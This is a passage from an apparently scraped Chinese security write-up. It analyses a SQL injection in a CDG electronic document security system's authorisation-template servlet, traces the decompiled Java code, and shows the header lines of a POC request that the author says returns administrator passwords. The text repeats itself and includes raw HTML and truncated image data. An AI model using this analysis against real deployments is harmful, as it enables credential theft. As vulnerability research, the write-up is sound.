ServiceUtil.sendInfo(request, response, this.xStream.toXML(gcat));
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
**分析**:上述代码就是接受前端的请求数据,数据类型为xml,将其进行xml反序列之后进行校验,进行校验成功之后调用`getAuthoriseTempletList`方法,之后将内容进行序列化返回给前端
|
|||
|
|
|
|||
|
|
我们先分析一下这个校验即`this.validateInfo(gcat);`
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
private boolean validateInfo(GetCDGAuthoriseTemplet gcat) {
|
|||
|
|
String userId \= gcat.getUserId();
|
|||
|
|
String secretLevelId \= gcat.getSecretLevelId();
|
|||
|
|
if (userId != null && !"".equals(userId)) {
|
|||
|
|
if (secretLevelId != null && !"".equals(secretLevelId)) {
|
|||
|
|
try {
|
|||
|
|
User localUser \= this.userDao.findUserById(userId);
|
|||
|
|
if (localUser \== null) {
|
|||
|
|
gcat.setReturnMessage("error007");
|
|||
|
|
return false;
|
|||
|
|
} else {
|
|||
|
|
return true;
|
|||
|
|
}
|
|||
|
|
} catch (Exception var5) {
|
|||
|
|
gcat.setReturnMessage("error104");
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
} else {
|
|||
|
|
gcat.setReturnMessage("error112");
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
} else {
|
|||
|
|
gcat.setReturnMessage("error101");
|
|||
|
|
return false;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
上述代码就是先判断序列化之后的内容中`userId`以及`secretLevelId`是否为空,不为空则进行`findUserById`操作,`Ctrl`点击跟进该方法
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:绿框中的内容对userid的内容转换为小写,尝试从缓存(usermap)中获取用户信息,找到将结果返回
|
|||
|
|
|
|||
|
|
蓝框中的内容就是去数据库中查找是否有该`userId`,若有则将结果返回
|
|||
|
|
|
|||
|
|
分析完这个校验之后,接着进入到校验成功之后else语句中即如图代码中
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:调用了`model.getAuthoriseTempletList`方法进行模板列表的更新,之后进行序列化并将结果返回给前端
|
|||
|
|
|
|||
|
|
`Ctrl`点击进入到`getAuthoriseTempletList`方法中
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
它又调用了`List<AuthoriseTemplet>`下的`getAuthoriseTempletList`方法,我们继续跟进
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:调用 `this.getAuthoriseTempletList(userId, secretLevelId)` 方法来获取与指定用户和密级相关的 `CDGAuthoriseTempletInfo` 对象列表其中包含包括名称(`name`)、描述(`description`)、密级(`secretLevel`)、创建日期(`createDate`)。然后创建一个空的 `ArrayList` 类型的 `authoriseTempletList`,用于存储转换后的 `AuthoriseTemplet` 对象,将获取到的对象列表中的内容给到`AuthoriseTemplet` 对象之后返回这个对象
|
|||
|
|
|
|||
|
|
我们进入到`getAuthoriseTempletList`方法中查看它是如何获取对象列表的
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:该方法就是判断我们传递的`userId`、 `secretLevelId`是否为空,若不为空就将其拼接到sql语句中(猜测这就是sql注入漏洞形成的原因),之后调用`dao.getAuthoriseTempletList(sqls.toString())`将其结果返回
|
|||
|
|
|
|||
|
|
进入到`List<CDGAuthoriseTempletInfo>`下的`getAuthoriseTempletList`方法中,这里见我们转入的参数进行了sql语句的拼接后,调用了`dao.getAuthoriseTempletList`方法,这里有多个地方声明了该方法我们选择的是第一个
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
**分析**:该方法会将我们传入的参数直接拼接到sql语句中即(`sql.append(condtion)`),之后进行调用`getCommonResults(sql.toString())`方法执行sql语句的查询(并且没有任何过滤)并将结果赋值给maps,之后就是判断maps是否为空,将maps中的内容赋值给list,返回list。
|
|||
|
|
|
|||
|
|
总结
|
|||
|
|
--
|
|||
|
|
|
|||
|
|
经过以上分析我们已经确定了该漏洞的成因,
|
|||
|
|
|
|||
|
|
1. `CDGAuthoriseTempletModel`下的`getAuthoriseTempletList`方法---&gt;`List<AuthoriseTemplet>下的 getAuthoriseTempletList`方法,其中的参数就是我们可以控制的由前端传过来`UserId`和`SecretLevelId`
|
|||
|
|
2. `List<AuthoriseTemplet>下的 getAuthoriseTempletList`方法--&gt;`List<CDGAuthoriseTempletInfo>`下的`getAuthoriseTempletList`方法,通过`sqls.append`将我们可以控制的参数进行sql语句的拼接
|
|||
|
|
3. `List<CDGAuthoriseTempletInfo>`下的`getAuthoriseTempletList`方法--&gt;`dao.getAuthoriseTempletList(sqls.toString())`只进行`getCommonResults`进而执行sql语句并将结果返回
|
|||
|
|
|
|||
|
|
因此只要我们在前端传入的参数`UserId`是缓存中的内容或者是数据库中的存在的值进而绕过`validateInfo`的if校验,进入到else语句中,之后`SecretLevelId`传入我们恶意的sql语句,进入`getAuthoriseTempletList`方法中进行sql语句的执行,这样从而将我们想要的数据以xml的格式返回到响应中
|
|||
|
|
|
|||
|
|
### 然后我们进行构造POC
|
|||
|
|
|
|||
|
|
电子文档安全管理系统(CDG)
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
然后用加解密工具去加密
|
|||
|
|
|
|||
|
|
<https://github.com/wafinfo/DecryptTools>
|
|||
|
|
|
|||
|
|
|
|||
|
|
发送 POC 可直接获取到管理员账户密码。
|
|||
|
|
|
|||
|
|
```php
|
|||
|
|
POST /CDGServer3/CDGAuthoriseTempletService1 HTTP/1.1
|
|||
|
|
|
|||
|
|
Host:
|
|||
|
|
|
|||
|
|
Cache-Control: max-age=0
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua-Mobile: ?0
|
|||
|
|
|
|||
|
|
Sec-Ch-Ua-Platform: "Windows"
|
|||
|
|
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
|
|||
|
|
|
|||
|
|
Gecko) Chrome/112.0.5615.138 Safari/537.36
|
|||
|
|
|
|||
|
|
Accept:
|
|||
|
|
|
|||
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*
|
|||
|
|
|
|||
|
|
/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|||
|
|
|
|||
|
|
Sec-Fetch-Site: none
|
|||
|
|
|
|||
|
|
Sec-Fetch-Mode: navigate
|
|||
|
|
|
|||
|
|
Sec-Fetch-User: ?1
|
|||
|
|
|
|||
|
|
Sec-Fetch-Dest: document
|
|||
|
|
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
|
|||
|
|
Connection: close
|
|||
|
|
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
|
|||
|
|
Content-Length: 510
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
加密数据
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
最后将返回的结果进行解密,可看到账户密码信息
|
|||
|
|
|
|||
|
|
</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h2 blockindex=0>影响版本</h2>
|
|||
|
|
<p blockindex=1>V5.6.3.152.186 20240811之前</p>
|
|||
|
|
<h2 blockindex=2>产品简介</h2>
|
|||
|
|
<p blockindex=3>某通电子文档安全管理系统是一款综合性的数据智能安全产品,涵盖了透明加密、数据分类分级、访问控制等多项核心技术。该系统保护范围广泛,包括终端电脑、智能终端以及各类应用系统,能有效防止数据泄露,满足数据安全合规要求。该系统采用事前主动防御、事中实时控制、事后及时追踪的设计理念,全方位保障用户终端数据安全。</p>
|
|||
|
|
<h2 blockindex=4>代码分析</h2>
|
|||
|
|
<p blockindex=5>首先进入<code>WEB-INF</code>的web.xml页面中,<code>Fn+F</code>搜索<code>CDGAuthoriseTempletService1</code></p>
|
|||
|
|
<p blockindex=6><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=7><code>Ctrl</code>点击键入该类中,该类位于<code>com/esafenet/servlet/service/document/CDGAuthoriseTempletService1.class</code>中,这个是一个servlet文件,找到与前端交互的方法即<code>service</code>方法</p>
|
|||
|
|
<p blockindex=8><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=9>对该代码分析如下</p>
|
|||
|
|
<pre blockindex=10><code class="hljs language-php"> <span class=hljs-keyword>protected</span> <span class=hljs-keyword>void</span> service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
|
|||
|
|
response.setContentType(<span class=hljs-string>"text/html"</span>);
|
|||
|
|
ServiceUtil.XMLInit(this.xStream);<span class=hljs-comment>//调用一个工具类,用于初始化初始化xstream对象,用于XML序列化和反序列化 </span>
|
|||
|
|
CDGAuthoriseTemplet caTempl \= <span class=hljs-keyword>new</span> CDGAuthoriseTemplet();<span class=hljs-comment>//可能是一个数据访问对象(DAO) </span>
|
|||
|
|
<span class=hljs-keyword>String</span> toServerXML \= ServiceUtil.getXMLFromRequest(request);<span class=hljs-comment>//获取请求中的xml字符串 </span>
|
|||
|
|
GetCDGAuthoriseTemplet gcat \= (GetCDGAuthoriseTemplet)this.xStream.fromXML(toServerXML);<span class=hljs-comment>//将XML字符串反序列化为GetCDGAuthoriseTemplet类型的对象gcat </span>
|
|||
|
|
<span class=hljs-keyword>boolean</span> flag \= this.validateInfo(gcat);<span class=hljs-comment>//对反序列化的内容进行校验 </span>
|
|||
|
|
<span class=hljs-keyword>if</span> (!flag) {<span class=hljs-comment>//校验结果为false,直接进行gcat序列化为xml发送响应 </span>
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(gcat));
|
|||
|
|
} <span class=hljs-keyword>else</span> {
|
|||
|
|
CDGAuthoriseTempletModel model \= <span class=hljs-keyword>new</span> CDGAuthoriseTempletModel();
|
|||
|
|
|
|||
|
|
<span class=hljs-keyword>try</span> {
|
|||
|
|
caTempl \= model.getAuthoriseTempletList(caTempl, gcat.getUserId(), gcat.getSecretLevelId());<span class=hljs-comment>//取授权模板列表 </span>
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(caTempl));<span class=hljs-comment>//将结果(即caTempl对象)的XML表示发送给客户端。 </span>
|
|||
|
|
} <span class=hljs-keyword>catch</span> (<span class=hljs-built_in>Exception</span> var9) {
|
|||
|
|
<span class=hljs-built_in>Exception</span> e \= var9;
|
|||
|
|
e.printStackTrace();
|
|||
|
|
gcat.setReturnMessage(<span class=hljs-string>"error099"</span>);
|
|||
|
|
ServiceUtil.sendInfo(request, response, this.xStream.toXML(gcat));
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=11><strong>分析</strong>:上述代码就是接受前端的请求数据,数据类型为xml,将其进行xml反序列之后进行校验,进行校验成功之后调用<code>getAuthoriseTempletList</code>方法,之后将内容进行序列化返回给前端</p>
|
|||
|
|
<p blockindex=12>我们先分析一下这个校验即<code>this.validateInfo(gcat);</code></p>
|
|||
|
|
<pre blockindex=13><code class="hljs language-php"> <span class=hljs-keyword>private</span> <span class=hljs-keyword>boolean</span> validateInfo(GetCDGAuthoriseTemplet gcat) {
|
|||
|
|
<span class=hljs-keyword>String</span> userId \= gcat.getUserId();
|
|||
|
|
<span class=hljs-keyword>String</span> secretLevelId \= gcat.getSecretLevelId();
|
|||
|
|
<span class=hljs-keyword>if</span> (userId != <span class=hljs-literal>null</span> && !<span class=hljs-string>""</span>.equals(userId)) {
|
|||
|
|
<span class=hljs-keyword>if</span> (secretLevelId != <span class=hljs-literal>null</span> && !<span class=hljs-string>""</span>.equals(secretLevelId)) {
|
|||
|
|
<span class=hljs-keyword>try</span> {
|
|||
|
|
User localUser \= this.userDao.findUserById(userId);
|
|||
|
|
<span class=hljs-keyword>if</span> (localUser \== <span class=hljs-literal>null</span>) {
|
|||
|
|
gcat.setReturnMessage(<span class=hljs-string>"error007"</span>);
|
|||
|
|
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
|
|||
|
|
} <span class=hljs-keyword>else</span> {
|
|||
|
|
<span class=hljs-keyword>return</span> <span class=hljs-literal>true</span>;
|
|||
|
|
}
|
|||
|
|
} <span class=hljs-keyword>catch</span> (<span class=hljs-built_in>Exception</span> var5) {
|
|||
|
|
gcat.setReturnMessage(<span class=hljs-string>"error104"</span>);
|
|||
|
|
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
|
|||
|
|
}
|
|||
|
|
} <span class=hljs-keyword>else</span> {
|
|||
|
|
gcat.setReturnMessage(<span class=hljs-string>"error112"</span>);
|
|||
|
|
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
|
|||
|
|
}
|
|||
|
|
} <span class=hljs-keyword>else</span> {
|
|||
|
|
gcat.setReturnMessage(<span class=hljs-string>"error101"</span>);
|
|||
|
|
<span class=hljs-keyword>return</span> <span class=hljs-literal>false</span>;
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
}
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=14>上述代码就是先判断序列化之后的内容中<code>userId</code>以及<code>secretLevelId</code>是否为空,不为空则进行<code>findUserById</code>操作,<code>Ctrl</code>点击跟进该方法</p>
|
|||
|
|
<p blockindex=15><img 